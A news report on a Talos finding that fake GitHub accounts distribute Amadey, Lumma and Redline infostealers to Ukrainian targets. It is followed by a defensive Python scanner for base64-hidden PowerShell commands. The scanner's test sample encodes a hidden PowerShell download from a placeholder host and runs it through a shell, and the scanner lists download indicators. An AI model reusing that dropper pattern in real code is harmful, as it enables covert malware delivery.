GitHub Exploited to Distribute Amadey, Lumma, and Redline InfoStealers in Ukraine

A newly uncovered Malware-as-a-Service (MaaS) scheme is leveraging GitHub repositories to disseminate various infostealer families. This discovery was made by cybersecurity analysts at Cisco Talos, who released their findings today. The report details how the threat actors are utilizing the Amadey bot to directly source malware from public GitHub repositories onto compromised systems.

This operation emerged in April 2025, although its activities can be traced back to at least February of the same year. This timeframe coincides with a phishing campaign targeting Ukrainian organizations through SmokeLoader emails. Analysts at Talos identified significant similarities in tactics and infrastructure between this earlier campaign and the new Amadey-driven operation, suggesting a potential connection between the two.

A particularly concerning aspect of this operation is the exploitation of GitHub. The attackers established fraudulent accounts that functioned as open directories, where they hosted payloads, tools, and Amadey plugins. By taking advantage of GitHub’s widespread credibility within corporate environments, they likely bypassed numerous standard web filters that could thwart access to malicious domains.

One such account, “Legendary99999,” played a central role in the operation. It contained over 160 repositories, each hosting a single malicious file that could be downloaded directly via a GitHub URL.

The malicious Legendary99999 account (Image via Cisco Talos)

Other accounts, such as “Milidmdds” and “DFfe9ewf,” employed similar strategies, though “DFfe9ewf” appeared to be more experimental in nature. Collectively, these accounts hosted various scripts, loaders, and binaries from multiple infostealer families, including Amadey, Lumma, Redline, and AsyncRAT.

Amadey itself is not a new entrant in the malware landscape; it initially surfaced in 2018 on Russian-speaking forums, marketed for around $500. It has been utilized by multiple groups for creating botnets and deploying additional malware. The malware is capable of harvesting system information, downloading supplementary tools, and expanding its functionalities through plug-ins. Despite its common use as a downloader, its adaptable architecture can pose a more significant risk depending on the configuration employed by its operators.

The technical associations between this campaign and the prior SmokeLoader operation revolve around a loader named “Emmenhtal.” First documented in 2024 by Orange Cyberdefense, Emmenhtal is a multi-layer downloader that obscures its final payload through layers of encryption. Talos discovered that various Emmenhtal variants were utilized in the phishing campaign targeting Ukrainian entities, as well as within scripts found on the fraudulent GitHub accounts.

Scripts hosted in the “Milidmdds” account, such as “Work.js” and “Putikatest.js,” bore striking similarities to those identified in the earlier campaign. The only distinctions were minor alterations in function names and final download locations. Rather than targeting SmokeLoader, these scripts fetched Amadey, PuTTY executables, and remote access tools like AsyncRAT.

The exploitation of GitHub was not restricted to JavaScript droppers. Talos also identified a Python script named “checkbalance.py,” which masqueraded as a cryptocurrency tool. This script secretly decoded and executed a PowerShell command that fetched Amadey from a known command-and-control server. Notably, it displayed an error message in broken Cyrillic, suggesting its origins or target audience.
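The “checkbalance.py” pattern described above, a script that hides a PowerShell command in encoded form and decodes it at runtime, is the kind of thing a defender can look for statically. The following is an added example, not code from the Talos report or from the campaign: it scans a script's text for base64 blobs, decodes the ones that are valid, and flags any that decode to a PowerShell invocation. The use of base64 as the encoding, the indicator keywords, and the constructed sample scripts (including the `c2.invalid` placeholder host) are assumptions for illustration; the report does not specify the encoding the real script used.

```python
import base64
import binascii
import re

# Constructed sample (assumption): a "balance checker" whose real purpose is
# to decode and run a hidden PowerShell download command. Nothing here is
# executed; the text is only scanned.
_HIDDEN_CMD = 'powershell -nop -w hidden -c "iwr http://c2.invalid/a.exe -OutFile a.exe"'
_BLOB = base64.b64encode(_HIDDEN_CMD.encode()).decode()
SUSPICIOUS_SCRIPT = f'''import base64, subprocess
def check_balance(addr):
    print("Checking balance...")
    cmd = base64.b64decode("{_BLOB}").decode()
    subprocess.run(cmd, shell=True)
'''

# Constructed benign counterpart with no encoded content.
BENIGN_SCRIPT = '''import json
def check_balance(addr):
    with open("balances.json") as fh:
        return json.load(fh).get(addr, 0)
'''

# Runs of base64 characters long enough to be worth decoding (24+ chars).
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")

# Case-insensitive substrings that mark a decoded blob as a PowerShell launcher.
PS_INDICATORS = (
    "powershell", "-encodedcommand", "-w hidden", "iex",
    "downloadstring", "invoke-webrequest", "iwr",
)


def _is_text(s: str) -> bool:
    """True if every character is printable or ordinary whitespace."""
    return all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def decode_candidates(text: str) -> list[str]:
    """Return every base64 blob in `text` that decodes to readable text.

    Both UTF-8 and UTF-16-LE are tried, the latter because PowerShell's
    -EncodedCommand expects UTF-16-LE input.
    """
    found = []
    for match in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue
        for encoding in ("utf-8", "utf-16-le"):
            try:
                decoded = raw.decode(encoding)
            except UnicodeDecodeError:
                continue
            if _is_text(decoded):
                found.append(decoded)
                break
    return found


def scan_script(text: str) -> list[dict]:
    """Flag decoded blobs that look like PowerShell launchers.

    Each finding lists the decoded command and the indicators it matched,
    sorted so results are stable for review and testing.
    """
    findings = []
    for decoded in decode_candidates(text):
        lowered = decoded.lower()
        hits = sorted(ind for ind in PS_INDICATORS if ind in lowered)
        if hits:
            findings.append({"decoded": decoded, "indicators": hits})
    return findings


if __name__ == "__main__":
    for name, script in (("suspicious", SUSPICIOUS_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(name, scan_script(script))
```

The scanner is deliberately conservative: it only reports blobs that decode to readable text and contain a PowerShell indicator, so ordinary long identifiers or embedded images do not trigger it. It will miss commands split across several short blobs or wrapped in a second layer of encoding, which is a reason to pair this kind of static check with process-creation monitoring for `python.exe` spawning `powershell.exe`.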
